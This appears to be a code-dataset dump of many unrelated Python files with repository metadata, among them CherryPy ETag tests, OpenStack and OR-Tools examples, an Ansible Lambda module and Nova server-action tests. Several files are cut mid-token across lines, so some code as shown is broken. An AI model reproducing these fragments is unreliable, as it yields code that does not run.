3,071
0.003256
import cherrypy from cherrypy.test import helper class ETagTest(helper.CPWebCase): def setup_server(): class Root: def resource(self): return "Oh wah ta goo Siam." resource.exposed = True def fail(self, code): code = int(code) if 300 <= code <= 399: raise cherrypy.HTTPRedirect([], code) else: raise cherrypy.HTTPError(code) fail.exposed = True def unicoded(self): return u'I am a \u1ee4nicode string.' unicoded.exposed = True unicoded._cp_config = {'tools.encode.on': True} conf = {'/': {'tools.etags.on': True, 'tools.etags.autotags': True, }} cherrypy.tree.mount(Root(), config=conf) setup_server = staticmethod(setup_s
erver) def test_etags(self): self.getPage("/resource") self.assertStatus('200 OK') self.assertHeader('Content-Type', 'text/html;charset=utf-8') self.assertBody('Oh wah ta goo Siam.') etag = self.assertHeader('ETag') # Test If-Match (both valid and invalid)
self.getPage("/resource", headers=[('If-Match', etag)]) self.assertStatus("200 OK") self.getPage("/resource", headers=[('If-Match', "*")]) self.assertStatus("200 OK") self.getPage("/resource", headers=[('If-Match', "*")], method="POST") self.assertStatus("200 OK") self.getPage("/resource", headers=[('If-Match', "a bogus tag")]) self.assertStatus("412 Precondition Failed") # Test If-None-Match (both valid and invalid) self.getPage("/resource", headers=[('If-None-Match', etag)]) self.assertStatus(304) self.getPage("/resource", method='POST', headers=[('If-None-Match', etag)]) self.assertStatus("412 Precondition Failed") self.getPage("/resource", headers=[('If-None-Match', "*")]) self.assertStatus(304) self.getPage("/resource", headers=[('If-None-Match', "a bogus tag")]) self.assertStatus("200 OK") def test_errors(self): self.getPage("/resource") self.assertStatus(200) etag = self.assertHeader('ETag') # Test raising errors in page handler self.getPage("/fail/412", headers=[('If-Match', etag)]) self.assertStatus(412) self.getPage("/fail/304", headers=[('If-Match', etag)]) self.assertStatus(304) self.getPage("/fail/412", headers=[('If-None-Match', "*")]) self.assertStatus(412) self.getPage("/fail/304", headers=[('If-None-Match', "*")]) self.assertStatus(304) def test_unicode_body(self): self.getPage("/unicoded") self.assertStatus(200) etag1 = self.assertHeader('ETag') self.getPage("/unicoded", headers=[('If-Match', etag1)]) self.assertStatus(200) self.assertHeader('ETag', etag1)
briancurtin/python-openstacksdk
examples/cluster/profile.py
Python
apache-2.0
2,100
0
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from exampl
es.connect import FLAVOR_NAME from examples.connect import IMAGE_NAME from examples.connect import NETWORK_NAME from examples.connect import SERVER_NAME """ Managing profiles in the Cluster service. For a full guide see https://developer.openstack.org/sdks/python/openstacksdk/users/guides/cluster.html """ def list_profiles(conn): print("List Profiles:") for profile in conn.cluster.profiles(): print(profile.to_dict()) fo
r profile in conn.cluster.profiles(sort='name:asc'): print(profile.to_dict()) def create_profile(conn): print("Create Profile:") spec = { 'profile': 'os.nova.server', 'version': 1.0, 'properties': { 'name': SERVER_NAME, 'flavor': FLAVOR_NAME, 'image': IMAGE_NAME, 'networks': { 'network': NETWORK_NAME } } } profile = conn.cluster.create_profile('os_server', spec) print(profile.to_dict()) def get_profile(conn): print("Get Profile:") profile = conn.cluster.get_profile('os_server') print(profile.to_dict()) def find_profile(conn): print("Find Profile:") profile = conn.cluster.find_profile('os_server') print(profile.to_dict()) def update_profile(conn): print("Update Profile:") profile = conn.cluster.update_profile('os_server', name='old_server') print(profile.to_dict()) def delete_profile(conn): print("Delete Profile:") conn.cluster.delete_profile('os_server') print("Profile deleted.")
adviti/melange
thirdparty/google_appengine/lib/django_1_2/tests/regressiontests/admin_ordering/models.py
Python
apache-2.0
224
0.004464
# coding: utf-8 from django.db import models class Band(models.Model): name = models.CharField(
max_length=100) bio = models.TextField() rank = models.IntegerField() class Meta: order
ing = ('name',)
mame98/ArchSetup
scripts/debug-preview.py
Python
gpl-3.0
1,383
0.005061
#!/usr/bin/env python3 import os import sys sys.path.insert(1, os.path.join(sys.path[0], '..')) from SetupTools.SetupConfig import SetupConfig from Interface.Interface import Interface import importlib import logging class Previewer: def __init__(self): logging.basicConfig(filename='ArchSetup.preview.log', level=logging.DEBUG, format='%(asctime)s - [%(relativeCreated)6d] - %(name)s - %(levelname)s - %(message)s') self.setupconfig = SetupConfig() self.interface = Interface(self.callback) self.interface.loop() def callback(self, event): if event == 'init': self.windows = [] self.window_index = 0 for x in sys.argv[1:]: i = importlib.import_module("Interface.
Windows."+x) cl = getattr(i, x) self.windows.append(cl(self.callback, self.setupconfig)) self.interface.addwin(self.windows[self.window_index]) elif event == 'prev': self.window_index -= 1 self.interface.addwin(self.windows[self.window_index]) elif event == 'next': self.window_index += 1 if self.window_index == len(self.windows): self.interface.exit()
return self.interface.addwin(self.windows[self.window_index]) if __name__ == "__main__": Previewer()
google/or-tools
ortools/constraint_solver/samples/vrp_tokens.py
Python
apache-2.0
6,133
0.000326
#!/usr/bin/env python3 # Copyright 2010-2021 Google LLC # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Simple VRP with special locations which need to be visited at end of the route.""" # [START import] from ortools.constraint_solver import routing_enums_pb2 from ortools.constraint_solver import pywrapcp # [END import] def create_data_model(): """Stores the data for the problem.""" data = {} # Special location don't consume token, while regular one consume one data['tokens'] = [ 0, # 0 depot 0, # 1 special node 0, # 2 special node 0, # 3 special node 0, # 4 special node 0, # 5 special node -1, # 6 -1, # 7 -1, # 8 -1, # 9 -1, # 10 -1, # 11 -1, # 12 -1, # 13 -1, # 14 -1, # 15 -1, # 16 -1, # 17 -1, # 18 ] # just need to be big enough, not a limiting factor data['vehicle_tokens'] = [20, 20, 20, 20] data['num_vehicles'] = 4 data['depot'] = 0 return data def print_solution(manager, routing, solution): """Prints solution on console.""" print(f'Objective: {solution.ObjectiveValue()}') token_dimension = routing.GetDimensionOrDie('Token') total_distance = 0 total_token = 0 for vehicle_id in range(manager.GetNumberOfVehicles()): plan_output = f'Route for vehicle {vehicle_id}:\n' index = routing.Start(vehicle_id) total_token += solution.Value(token_dimension.CumulVar(index)) route_distance = 0 route_token = 0 while not routing.IsEnd(index): node_index = manager.IndexToNode(index) token_var = token_dimension.CumulVar(index) route_token = solution.Value(token_var) plan_output += f' {node_index} Token({route_token}) -> ' previous_index = index index = solution.Value(routing.NextVar(index)) route_distance += routing.GetArcCostForVehicle( previous_index, index, vehicle_id) node_index = manager.IndexToNode(index) token_var = token_dimension.CumulVar(index) route_token = solution.Value(token_var) plan_output += f' {node_index} Token({route_token})\n' plan_output += f'Distance of the route: {route_distance}m\n' total_distance += route_distance print(plan_output) print('Total distance of all routes: {}m'.format(total_distance)) print('Total token of all routes: {}'.format(total_token)) def main(): """Solve the CVRP problem.""" # Instantiate the data problem. data = create_data_model() # Create the routing index manager. manager = pywrapcp.RoutingIndexManager(len(data['tokens']), data['num_vehicles'], data['depot']) # Create Routing Model. routing = pywrapcp.RoutingModel(manager) # Create and register a transit callback. def distance_callback(from_index, to_index): """Returns the distance between the two nodes.""" del from_index del to_index return 10 transit_callback_index = routing.RegisterTransitCallback(distance_callback) routing.AddDimension( transit_callback_index, 0, # null slack 3000, # maximum distance per vehicle True, # start cumul to zero 'distance') distance_dimension = routing.GetDimensionOrDie('distance') distance_dimension.SetGlobalSpanCostCoefficient(100) # Define cost of each arc. routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index) # Add Token constraint. def token_callback(from_index): """Returns the number of token consumed by the node.""" # Convert from routing variable Index to tokens NodeIndex. from_node = manager.IndexToNode(from_index) return data['tokens'][from_node] token_callback_index = routing.RegisterUnaryTransitCallback(token_callback) routing.AddDimensionWithVehicleCapacity( token_callback_index, 0, # null capacity slack data['vehicle_tokens'], # vehicle maximum tokens False, # start cumul to zero 'Token') # Add constraint: special node can only be visited if token remaining is zero token_dimension = routing.GetDimensionOrDie('Token') for node in range(1, 6): index = manager.NodeToIndex(node) routing.solver().Add(token_dimension.CumulVar(index) == 0) # Instantiate route start and end times to produce feasible times. # [START depot_start_end_times] for i in range(manager.GetNumberOfVehicles()): routing.AddVariableMinimizedByFinalizer( token_dimension.CumulVar(routing.Start(i))) routing.AddVariableMinimizedByFinalizer( token_dimension.CumulVar(routing.End(i))) # [END depot_start_end_times] # Setting first solution heuristic. search_parameters = pywrapcp.DefaultRoutingSearchParameters() search_parameters.first_solution_strategy = ( routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC) search_parameters.local_search_metaheuristic = ( routing_enums_pb2.LocalSearchMetaheuristic.GUIDED_LOCAL_SEARCH) search_para
meters.time_limit.FromSeconds(1) # Solve the problem. solution = routing.SolveWithParameters(search_parameters) # Print solution on console. # [START print_solution] if solution:
print_solution(manager, routing, solution) else: print('No solution found !') # [END print_solution] if __name__ == '__main__': main()
kevthehermit/viper
viper/common/autorun.py
Python
bsd-3-clause
1,981
0.002019
# -*- coding: utf-8 -*- # This file is part of Viper - https://github.com/viper-framework/viper # See the file 'LICENSE' for copying permission. from viper.common.out import print_info from viper.common.out import print_error from viper.common.out import print_output from viper.core.plugins import __modules__ from viper.core.session import __sessions__ from viper.core.database import Database from viper.core.config import __config__ from viper.core.storage import get_sample_path cfg = __config__ def parse_commands(data): root = '' args = [] words = data.split() root = words[0] if len(words) > 1: args = words[1:] return root, args def autorun_module(file_hash): if not file_hash: return if not __sessions__.is_set(): __sessions__.new(get_sample_path(file_hash)) for cmd_line in cfg.autorun.commands.split(','): split_commands = cmd_line.split(';') for split_command in split_commands: split_command = split_command.strip()
if not split_command: continue root, args = parse_commands(split_command) try: if root in __modules__: print_info("Running command \"{0}\"".format(split_command)) module = __modules__[root]['obj']() module.set_command
line(args) module.run() if cfg.modules.store_output and __sessions__.is_set(): Database().add_analysis(file_hash, split_command, module.output) if cfg.autorun.verbose: print_output(module.output) del(module.output[:]) else: print_error("\"{0}\" is not a valid command. Please check your viper.conf file.".format(cmd_line)) except: print_error("Viper was unable to complete the command {0}".format(cmd_line))
alxgu/ansible
lib/ansible/modules/cloud/amazon/lambda_facts.py
Python
gpl-3.0
13,097
0.003054
#!/usr/bin/python # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: lambda_facts short_description: Gathers AWS Lambda function details as Ansible facts description: - Gathers various details related to Lambda functions, including aliases, versions and event source mappings. Use module M(lambda) to manage the lambda function itself, M(lambda_alias) to manage function aliases and M(lambda_event) to manage lambda event source mappings. version_added: "2.2" options: query: description: - Specifies the resource type for which to gather facts. Leave blank to retrieve all facts. required: true choices: [ "aliases", "all", "config", "mappings", "policy", "versions" ] default: "all" function_name: description: - The name of the lambda function for which facts are requested. aliases: [ "function", "name"] event_source_arn: description: - For query type 'mappings', this is the Amazon Resource Name (ARN) of the Amazon Kinesis or DynamoDB stream. author: Pierre Jodouin (@pjodouin) requirements: - boto3 extends_documentation_fragment: - aws - ec2 ''' EXAMPLES = ''' --- # Simple example of listing all info for a function - name: List all for a specific function lambda_facts: query: all function_name: myFunction register: my_function_details # List all versions of a function - name: List function versions lambda_facts: query: versions function_name: myFunction register: my_function_versions # List all lambda function versions - name: List all function lambda_facts: query: all max_items: 20 - name: show Lambda facts debug: var: lambda_facts ''' RETURN = ''' --- lambda_facts: description: lambda facts returned: success type: dict lambda_facts.function: description: lambda function list returned: success type: dict lambda_facts.function.TheName: description: lambda function information, including event, mapping, and version information returned: success type: dict ''' from ansible.module_utils.aws.core import AnsibleAWSModule from ansible.module_utils.ec2 import camel_dict_to_snake_dict, get_aws_connection_info, boto3_conn import json import datetime import sys import re try: from botocore.exceptions import ClientError except ImportError: pass # protected by AnsibleAWSModule def fix_return(node): """ fixup returned dictionary :param node: :return: """ if isinstance(node, datetime.datetime): node_value = str(node) elif isinstance(node, list): node_value = [fix_return(item) for item in node] elif isinstance(node, dict): node_value = dict([(item, fix_return(node[item])) for item in node.keys()]) else: node_value = node return node_value def alias_details(client, module): """ Returns list of aliases for a specified function. :param client: AWS API client reference (boto3) :param module: Ansible module reference :return dict: """ lambda_facts = dict() function_name = module.params.get('function_name') if function_name: params = dict() if module.params.get('max_items'):
params['MaxItems'] = module.params.get('max_items') if module.params.get('next_marker'): params['Marker'] = module.params.get('next_marker') try: lambda_facts.update(aliases=client.list_aliases(FunctionName=function_n
ame, **params)['Aliases']) except ClientError as e: if e.response['Error']['Code'] == 'ResourceNotFoundException': lambda_facts.update(aliases=[]) else: module.fail_json_aws(e, msg="Trying to get aliases") else: module.fail_json(msg='Parameter function_name required for query=aliases.') return {function_name: camel_dict_to_snake_dict(lambda_facts)} def all_details(client, module): """ Returns all lambda related facts. :param client: AWS API client reference (boto3) :param module: Ansible module reference :return dict: """ if module.params.get('max_items') or module.params.get('next_marker'): module.fail_json(msg='Cannot specify max_items nor next_marker for query=all.') lambda_facts = dict() function_name = module.params.get('function_name') if function_name: lambda_facts[function_name] = {} lambda_facts[function_name].update(config_details(client, module)[function_name]) lambda_facts[function_name].update(alias_details(client, module)[function_name]) lambda_facts[function_name].update(policy_details(client, module)[function_name]) lambda_facts[function_name].update(version_details(client, module)[function_name]) lambda_facts[function_name].update(mapping_details(client, module)[function_name]) else: lambda_facts.update(config_details(client, module)) return lambda_facts def config_details(client, module): """ Returns configuration details for one or all lambda functions. :param client: AWS API client reference (boto3) :param module: Ansible module reference :return dict: """ lambda_facts = dict() function_name = module.params.get('function_name') if function_name: try: lambda_facts.update(client.get_function_configuration(FunctionName=function_name)) except ClientError as e: if e.response['Error']['Code'] == 'ResourceNotFoundException': lambda_facts.update(function={}) else: module.fail_json_aws(e, msg="Trying to get {0} configuration".format(function_name)) else: params = dict() if module.params.get('max_items'): params['MaxItems'] = module.params.get('max_items') if module.params.get('next_marker'): params['Marker'] = module.params.get('next_marker') try: lambda_facts.update(function_list=client.list_functions(**params)['Functions']) except ClientError as e: if e.response['Error']['Code'] == 'ResourceNotFoundException': lambda_facts.update(function_list=[]) else: module.fail_json_aws(e, msg="Trying to get function list") functions = dict() for func in lambda_facts.pop('function_list', []): functions[func['FunctionName']] = camel_dict_to_snake_dict(func) return functions return {function_name: camel_dict_to_snake_dict(lambda_facts)} def mapping_details(client, module): """ Returns all lambda event source mappings. :param client: AWS API client reference (boto3) :param module: Ansible module reference :return dict: """ lambda_facts = dict() params = dict() function_name = module.params.get('function_name') if function_name: params['FunctionName'] = module.params.get('function_name') if module.params.get('event_source_arn'): params['EventSourceArn'] = module.params.get('event_source_arn') if module.params.get('max_items'): params['MaxItems'] = module.params.get('max_items') if module.params.get('next_marker'): params['Marker'] = module.params.get('next_marker') try: lambda_facts.update(mappings=client.list_event_source_mappings(**params)['EventSourceMappings'])
dozymoe/PyCircularBuffer
tests/test_index.py
Python
mit
527
0.001898
from circularbuffer import CircularBuffer from pytest import raises def test_index(): buf = CircularBuffer(32) buf.write(b'asdf\r\njkl;\r\n1234\r\n') assert buf.index(b'\r\n') == 4 assert buf.index(b'\r\n', 5) == 10 with raises(ValueError): buf.inde
x(b'x') buf.clear() buf.write(b'asdf\r\njkl;\r\n1234\r\na') assert buf.index(b'\r\n') == 4 assert buf.index(b'
\r\n', 5) == 10 with raises(ValueError): buf.index(b'x') with raises(ValueError): buf.index(b'')
CyrilWaechter/pyRevitMEP
pyRevitMEP.tab/Lab.panel/Lab.pulldown/ConvertToFlexPipe.pushbutton/script.py
Python
gpl-3.0
451
0.004435
import rpw from pyrevit.script import get_logger logger = get_logger() selection = rpw.ui.Selection() # TODO check in only one loop number_of_unused_connectors =
sum([element.ConnectorManager.UnusedConnectors.Size for element in selection]) logger.debug(number_of_unused_connectors) if number_of_unused_connectors > 2: rpw.ui.forms.Alert('Please select only one loop') for element in selection: element.Conne
ctorManager.UnusedConnectors
kenshay/ImageScript
ProgramData/SystemFiles/Python/Lib/site-packages/elan/Pools/Quick_Tests/7____Set_System_Description_Restart_Check___.py
Python
gpl-3.0
639
0.007825
from elan import * #Set System description #Finished Viewer.Start() Viewer.CloseAndClean() Configurator.Start() Configurator.basicinformation.Click() Configurator.systemname.Wait() sleep(1) Configurator.Edit.SetText(2,"Changed") Configurator.apply.Wait() Configurator.apply.Click() Configurator.RestartHard() Configurator.WaitForControllerToComeBackOnline() Configurator.Start() Configurator.basicinformation.Click() Configurator.systemdescriptionchangedset.Wait() Configurat
or.Edit.SetText(2," ") Configurator.apply.Wait() Configurator.apply.Click() Configurator.CloseAndClean() print('
Finished')
brennmat/ruediPy
documentation/ruediPy/list_python_API.py
Python
gpl-3.0
1,842
0.050489
#!/usr/bin/env python3 import inspect from classes.rgams_SRS import rgams_SRS from classes.selectorvalve_VICI import selectorvalve_VICI from classes.selectorvalve_compositeVICI import selectorvalve_compositeVICI from classes.pressuresensor_WIKA import pressuresensor_WIKA from classes.pressuresensor_OMEGA import pressuresensor_OMEGA from classes.temperaturesensor_MAXIM import temperaturesensor_MAXIM from classes.datafile import datafile from classes.misc import misc CLASSES = [ rgams_SRS , selectorvalve_VICI , selectorvalve_compositeVICI , pressuresensor_WIKA , pressuresensor_OMEGA , temperaturesensor_MAXIM , datafile , misc ] outfile = open('python_API.tex', 'w') outfile.write( '%% THIS NEEDS THE underscore PACKAGE: \\usepackage[strings]{underscore}\n\n' ) for X in CLASSES: outfile.write ( '\subsubsection{Class \\texttt{' + X.__name__ + '}}\n' ) P = inspect.getsourcef
ile(X) outfile.write ( '\path{' + P[P.find('python'):len(P)] + '}\par\n' ) doc = inspect.getdoc(X) if doc is None: outfile.write ( 'No class description available.\par' ) else: # outfile.write ( '\\texttt{' + inspect.getdoc(X) + '+\n' ) outfile.write ( inspect.getdoc(X) + '\par' ) outfile.write ( '\n\n' ) for name, data in inspect.getmembers(X): if name[0:2] == '__
' : continue if name == '__doc__': continue if name == '__init__': continue if name == '__module__': continue outfile.write ( '\paragraph{Method \\texttt{' + name + '}}\n\\vspace{1ex}\n' ) exec ( 'doc = ' + X.__name__ + '.' + name + '.__doc__' ) if doc is None: outfile.write ( 'No method description available.\par' ) else: u = '' for line in doc.splitlines(): u = u + line.lstrip() + '\\newline\n' outfile.write ( '\\texttt{' + u + '}' ) outfile.write ( '\n\n' ) outfile.close()
skashyap7/polar.usc.edu
html/team25ev/similarity_clustering/read_json.py
Python
apache-2.0
416
0.012019
import scipy.cluster.hierarchy as hcl from sc
ipy.spatial.distance import squareform import pandas as pd import numpy as np from matplotlib import pyplot as plt from scipy.cluster.hierarchy import dendrogram import scipy import json #data = pd.read_json(path_or_buf= 'C:\Users\davtalab\Desktop\outJSON
.json') parsed_json = json.loads(open('C:\Users\davtalab\Desktop\data.json').read()) print parsed_json[1]['id']
vmthunder/nova
nova/tests/api/openstack/compute/test_server_actions.py
Python
apache-2.0
60,337
0.000447
# Copyright 2011 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import base64 import uuid import mock import mox from oslo.config import cfg import webob from nova.api.openstack.compute import servers from nova.compute import api as compute_api from nova.compute import task_states from nova.compute import vm_states from nova import context from nova import db from nova import exception from nova.image import glance from nova import objects from nova.openstack.common import jsonutils from nova.openstack.common import uuidutils from nova import test from nova.tests.api.openstack import fakes from nova.tests import fake_block_device from nova.tests import fake_instance from nova.tests.image import fake from nova.tests import matchers from nova.tests import utils CONF = cfg.CONF CONF.import_opt('password_length', 'nova.utils') FAKE_UUID = fakes.FAKE_UUID INSTANCE_IDS = {FAKE_UUID: 1} def return_server_not_found(*arg, **kwarg): raise exception.NotFound() def instance_update_and_get_original(context, instance_uuid, values, update_cells=True, columns_to_join=None, ): inst = fakes.stub_instance(INSTANCE_IDS[instance_uuid], host='fake_host') inst = dict(inst, **values) return (inst, inst) def instance_update(context, instance_uuid, kwargs, update_cells=True): inst = fakes.stub_instance(INSTANCE_IDS[instance_uuid], host='fake_host') return inst class MockSetAdminPassword(object): def __init__(self): self.instance_id = None self.password = None def __call__(self, context, instance, password): self.instance_id = instance['uuid'] self.password = password class ServerActionsControllerTest(test.TestCase): image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6' image_href = 'http://localhost/v2/fake/images/%s' % image_uuid def setUp(self): super(ServerActionsControllerTest, self).setUp() self.stubs.Set(db, 'instance_get_by_uuid', fakes.fake_instance_get(vm_state=vm_states.ACTIVE, host='fake_host')) self.stubs.Set(db, 'instance_update_and_get_original', instance_update_and_get_original) fakes.stub_out_nw_api(self.stubs) fakes.stub_out_compute_api_snapshot(self.stubs) fake.stub_out_image_service(self.stubs) self.flags(allow_instance_snapshots=True, enable_instance_password=True) self.uuid = FAKE_UUID self.url = '/v2/fake/servers/%s/action' % self.uuid self._image_href = '155d900f-4e14-4e4c-a73d-069cbf4541e6' class FakeExtManager(object): def is_loaded(self, ext): return False self.controller = servers.Controller(ext_mgr=FakeExtManager()) self.compute_api = self.controller.compute_api self.context = context.RequestContext('fake', 'fake') self.app = fakes.wsgi_app(init_only=('servers',), fake_auth_context=self.context) def _make_request(self, url, body): req = webob.Request.blank('/v2/fake' + url) req.method = 'POST' req.body = jsonutils.dumps(body) req.content_type = 'application/json' return req.get_response(self.app) def _stub_instance_get(self, uuid=None): self.mox.StubOutWithMock(compute_api.API, 'get') if uuid is None: uuid = uuidutils.generate_uuid() instance = fake_instance.fake_db_instance( id=1, uuid=uuid, vm_state=vm_states.ACTIVE, task_state=None) instance = objects.Instance._from_db_object( self.context, objects.Instance(), instance) self.compute_api.get(self.context, uuid, want_objects=True).AndReturn(instance) return instance def _test_locked_instance(self, action, method=None, body_map=None, compute_api_args_map=None): if method is None: method = action if body_map is None: body_map = {} if compute_api_args_map is None: compute_api_args_map = {} instance = self._stub_instance_get() args, kwargs = compute_api_args_map.get(action, ((), {})) getattr(compute_api.API, method)(self.context, instance, *args, **kwargs).AndRaise( exception.InstanceIsLocked(instance_uuid=instance['uuid'])) self.mox.ReplayAll() res = self._make_request('/servers/%s/action' % instance['uuid'], {action: body_map.get(action)}) self.assertEqual(409, res.status_int) # Do these here instead of tearDown because this method is called # more than once for the same test case self.mox.VerifyAll() self.mox.UnsetStubs() def test_actions_with_locked_instance(self): actions = ['resize', 'confirmResize', 'revertResize', 'reboot', 'rebuild'] method_translations = {'confirmResize': 'confirm_resize', 'revertResize': 'revert_resize'} body_map = {'resize': {'flavorRef': '2'}, 'reboot': {'type': 'HARD'}, 'rebuild': {'imageRef': self.image_uuid, 'adminPass': 'TNc53Dr8s7vw'}} args_map = {'resize': (('2'), {}), 'confirmResize': ((), {}), 'reboot': (('HARD',), {}), 'rebuild': ((self.image_uuid, 'TNc53Dr8s7vw'), {'files_to_inject': None})} for action in actions: method = method_translations.get(action) self.mox.StubOutWithMock(compute_api.API, method or action) self._test_locked_instance(action, method=method, body_map=body_map, compute_api_args_map=args_map) def test_server_change_password(self): mock_method = MockSetAdminPassword() self.stubs.Set(compute_api.API, 'set_admin_password', mock_method) body = {'changePassword': {'adminPass': '1234pass'}} req = fakes.HTTPRequest.blank(self.url) self.controller._action_change_password(req, FAKE_UUID, body) self.assertEqual(mock_method.instance_id, self.uuid) self.assertEqual(mock_method.password, '1234pass') def test_server_change_password_pass_disabled(self): # run with enable_instance_password disabled to verify adminPass # is missing from response. See lp bug 921814 self.flags(enable_instance_password=False) mock_method = MockSetAdminPassword() self.stubs.Set(compute_api.API, 'set_admin_password', mock_
method) body = {'changePassword': {'adminPass': '1234pass'}} req = fakes.HTTPRequest.blank(self.url) self.controller._action_change_password(req, FAKE_UUID, body) self.assertEqual(mock_method.instance_id, self.uuid) # note,the mock still contains the password. self.assertEqual(mock_method.password, '1234pass') def test_server_change_password_not_a_string(self): body = {'changePassword': {'adminPass': 1234}} req = fakes.
HTTPRequest.blank(self.url) self.assertRaises(webob.exc.HTTPBadRequest, self.controller._action_change_password, req, FAKE_UUID, body) def tes
onaio/dkobo
dkobo/koboform/serializers.py
Python
agpl-3.0
2,038
0.002944
from rest_framework import serializers from models import SurveyDraft from taggit.models import Tag class WritableJSONField(serializers.Field): """ Serializer for JSONField -- required to make field writable""" """ ALSO REQUIRED because the default JSONField serialization includes the `u` prefix on strings when running Django 1.8, resulting in invalid JSON """ def __init__(self, **kwargs): self.allow_blank= kwargs.pop('allow_blank', False) super(WritableJSONField, self).__init__(**kwargs) def to_internal_value(self, data): if (not data) and (not self.required): return None else: try: return json.loads(data) except Exception as e: raise serializers.ValidationError( u'Unable to parse JSON: {}'.format(e)) def to_representation(self, value): return value class ListSurveyDraftSerializer(serializers.HyperlinkedModelSeriali
zer): class Meta: model = SurveyDraft fields = ('id', 'name', 'asset_type',
'summary', 'date_modified', 'description') summary = WritableJSONField(required=False) class DetailSurveyDraftSerializer(serializers.HyperlinkedModelSerializer): tags = serializers.SerializerMethodField('get_tag_names') summary = WritableJSONField(required=False) class Meta: model = SurveyDraft fields = ('id', 'name', 'body', 'summary', 'date_modified', 'description', 'tags') def get_tag_names(self, obj): return obj.tags.names() class TagSerializer(serializers.HyperlinkedModelSerializer): count = serializers.SerializerMethodField() label = serializers.CharField(source='name') class Meta: model = Tag fields = ('id', 'label', 'count') def get_count(self, obj): return SurveyDraft.objects.filter(tags__name__in=[obj.name])\ .filter(user=self.context.get('request', None).user)\ .filter(asset_type='question')\ .count()
e7dal/hexy
hexy/cursor.py
Python
gpl-3.0
1,100
0.128182
from .util.deb import deb from .util.nrange import nrange from .cell import Cell #F,e,Cursor from .grid import spoint CURSOR_POS=None d
ef gcp(): #get cursor position global CURSOR_POS deb('gcp'
,CURSOR_POS) return CURSOR_POS def scp(x,y): deb('scp',gcp(),x,y) cxc=0 #todo, normalize in cursor... global CURSOR_POS CURSOR_POS=(x,y) assert (x,y)==gcp() #todo cpget and cpset cpget=gcp cpset=scp def cursor(HG,x,y,f,X,Y): deb('make an a cursor in the empty space around point in cell x,y',x,y) #x,y=x-1,y-1 assert len(f)==4 #HG=_clearcursor(HG) i=x j=y scp(i,j) cxl=Cell(f[0],0,0) cyu=Cell(f[1],0,0) cxr=Cell(f[2],0,0) cyd=Cell(f[3],0,0,) HG=spoint(i-1,j,HG,cxl) HG=spoint(i,j-1,HG,cyu) HG=spoint(i+1,j,HG,cxr) HG=spoint(i,j+1,HG,cyd) return HG def grid_cursor(HG,x,y,f,X,Y): return cursor(HG,x,y,f,X,Y) def _clearcursor(HG): cp=gcp() r1=r2=r3=r4=Cell('.',0,0) deb('clear a cursor in the empty space around point in cell x,y',cp) if not cp:return HG i,j=cp HG=spoint(i-1,j,HG,r1) HG=spoint(i,j-1,HG,r2) HG=spoint(i+1,j,HG,r3) HG=spoint(i,j+1,HG,r4) return HG
frippe12573/geonode
geonode/maps/urls.py
Python
gpl-3.0
2,230
0.001794
# -*- coding: utf-8 -*- ######################################################################### # # Copyright (C) 2012 OpenPlans # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public
License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # #####################
#################################################### from django.conf.urls.defaults import patterns, url js_info_dict = { 'packages': ('geonode.maps',), } urlpatterns = patterns('geonode.maps.views', url(r'^$', 'map_list', name='maps_browse'), url(r'^tag/(?P<slug>[-\w]+?)/$', 'maps_tag', name='maps_browse_tag'), url(r'^new$', 'new_map', name="new_map"), url(r'^new/data$', 'new_map_json', name='new_map_json'), url(r'^(?P<mapid>\d+)$', 'map_detail', name='map_detail'), url(r'^(?P<mapid>\d+)/view$', 'map_view', name='map_view'), url(r'^(?P<mapid>\d+)/data$', 'map_json', name='map_json'), url(r'^(?P<mapid>\d+)/download$', 'map_download', name='map_download'), url(r'^(?P<mapid>\d+)/wmc$', 'map_wmc', name='map_wmc'), url(r'^(?P<mapid>\d+)/remove$', 'map_remove', name='map_remove'), url(r'^(?P<mapid>\d+)/metadata$', 'map_metadata', name='map_metadata'), url(r'^(?P<mapid>\d+)/embed$', 'map_embed', name='map_embed'), url(r'^(?P<mapid>\d+)/permissions$', 'map_permissions', name='map_permissions'), url(r'^(?P<mapid>\d+)/thumbnail$', 'map_thumbnail', name='map_thumbnail'), url(r'^check/$', 'map_download_check', name='map_download_check'), url(r'^embed/$', 'map_embed', name='map_embed'), url(r'^(?P<layername>[^/]*)/attributes', 'maplayer_attributes', name='maplayer_attributes'), #url(r'^change-poc/(?P<ids>\w+)$', 'change_poc', name='maps_change_poc'), )
